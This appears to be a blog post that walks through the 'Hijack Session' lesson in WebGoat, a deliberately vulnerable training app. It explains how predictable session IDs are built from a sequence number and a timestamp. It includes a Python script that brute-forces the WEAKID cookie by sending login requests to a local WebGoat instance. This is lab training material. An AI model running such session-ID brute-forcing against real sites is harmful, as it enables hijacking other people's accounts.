Pages

Thursday, November 24, 2011

PoC fuzzer for weak session ID (WebGoat Hijack Session level)

The "Hijack Session" level from Session Management Flaws category guides you through cracking (through brute-force) a weak session id number, predictable, based on 2 parts:
- a sequential number
- time (in milliseconds) 


The first part of the solution implies using WebScarab's session analysis features. After finding out the missing number, and the time range for the missing number, the session cookie can be easily cracked. A Java tool for doing this is J-Baah. 
A simple python script to do just that, brute force the time variable, could be:
'''
Fuzzer for weak session ID (WebGoat Hijack Session level)

'''

import httplib

if __name__=="__main__":
 httpServ = httplib.HTTPConnection("127.0.0.1", 80)
 
 httpServ.connect()

 for wid in range (473, 582):
  weakid = "10991-1322155944%s" % wid
 
  headers = {"Host": "localhost",
     "Proxy-Connection": "keep-alive",
     "Content-length": "69",
     "Cache-Control": "max-age=0",
     "Origin": "http://localhost",
     "User-Agent": "Fuzzy",
     "Content-Type": "application/x-www-form-urlencoded",
     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
     "Referer": "http://localhost/WebGoat/attack?Screen=192&menu=1700",
     "Accept-Encoding": "gzip,deflate,sdch",
     "Accept-Language": "en-US,en;q=0.8",
     "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
     "Cookie": "JSESSIONID=E7F6B85DD9423511BF95E45B70332DAB; WEAKID=%s" % weakid,
     "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}
  httpServ.request('POST', 
      '/WebGoat/attack?Screen=192&menu=1700', 
      'Username=Jack&Password=sniffy&WEAKID=%s&SUBMIT=Login'% weakid,
      headers)

  response = httpServ.getresponse()
  print "weakid: ", weakid
  print response.read()
 
  httpServ.close()
 


(Modifications needed for adjusting the missing sequential number (found through WebScarab session analysis), and the time range. )